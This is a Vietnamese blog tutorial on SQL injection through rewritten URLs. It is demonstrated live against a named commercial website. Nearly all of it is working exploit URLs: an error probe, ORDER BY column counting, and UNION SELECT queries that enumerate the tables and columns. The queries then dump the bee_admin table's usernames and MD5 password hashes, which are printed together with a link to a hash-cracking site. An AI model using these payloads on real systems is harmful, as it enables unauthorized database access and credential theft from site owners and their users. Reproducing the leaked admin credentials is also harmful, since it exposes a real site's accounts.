Saturday, May 31, 2014

Tutorial sql injection rewrite url html

Demo sql injection site canvang.com

Chỉ mang tính chất học hỏi, chia sẻ exp thôi nhé, ai biết rồi thì cho qua hộ mình =.='


1. Đầu tiên tìm lỗi sql injection ở link nào nha :


Ở đây mình tìm được : 
http://www.canvang.com/sanpham/84/211/Qua-Can-Chuan-Inox.html
Thêm ' để biết có lỗi sqli hay không : 

thử thêm sau Inox xem sao : 
http://www.canvang.com/sanpham/84/211/Qua-Can-Chuan-Inox'.html
==>> không thấy gì !

http://www.canvang.com/sanpham/84/211'/Qua-Can-Chuan-Inox.html
==>> oke đã thấy lỗi.



Các bước tiếp theo thì bạn nào đọc qua bài sql injection  cơ bản rồi thì chắc sẽ đọc lướt qua thôi nhĩ ~.~


2. Tìm số trường cột qua order by 22-- -


Thử ORDER BY thôi nào :D (ở đây mình làm rồi nên làm nhanh nhé)
http://www.canvang.com/sanpham/84/211+order+by+22--+-/Qua-Can-Chuan-Inox.html --> không lỗi.
http://www.canvang.com/sanpham/84/211+order+by+23--+-/Qua-Can-Chuan-Inox.html --> lỗi nè.


3. Xác định vị trí trường cột bị lỗi : 


Sử dụng UNION SELECT nhé, nhớ thêm "-" trước "id".
http://www.canvang.com/sanpham/84/-211+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+-/Qua-Can-Chuan-Inox.html

oke lỗi ở cột 4,6,9,17.


4. Xuất ra tên các tables trong database


Mình lấy cột 17 cho dể nhìn.
http://www.canvang.com/sanpham/84/-211+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(group_concat(table_name))),18,19,20,21,22+from+information_schema.tables+where+table_schema=database()--+-/Qua-Can-Chuan-Inox.html




5. Xuất ra tên các colums trong table bee_admin :


http://www.canvang.com/sanpham/84/-211+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(group_concat(column_name))),18,19,20,21,22+from+information_schema.columns+where+table_schema=database() and table_name=0x6265655f61646d696e--+-/Qua-Can-Chuan-Inox.html
| id,username,password,ymnick,type,capnhat |


6. Xuất ra thông tin của username,password :


http://www.canvang.com/sanpham/84/-211+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(group_concat(username,0x2f,password))),18,19,20,21,22+from+bee_admin--+-/Qua-Can-Chuan-Inox.html

ôke đã xong.
| root/\ff6356f0eab5c5a0c7418de24953b982 |
| nam/\e10adc3949ba59abbe56e057f20f883e |
| minhdinh19782003/\ff6356f0eab5c5a0c7418de24953b982 |
crack pass : http://www.hashkiller.co.uk/md5-decrypter.aspx


end tutorial(TzT-eror69)
Được đăng bởi vào lúc
Nhãn: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)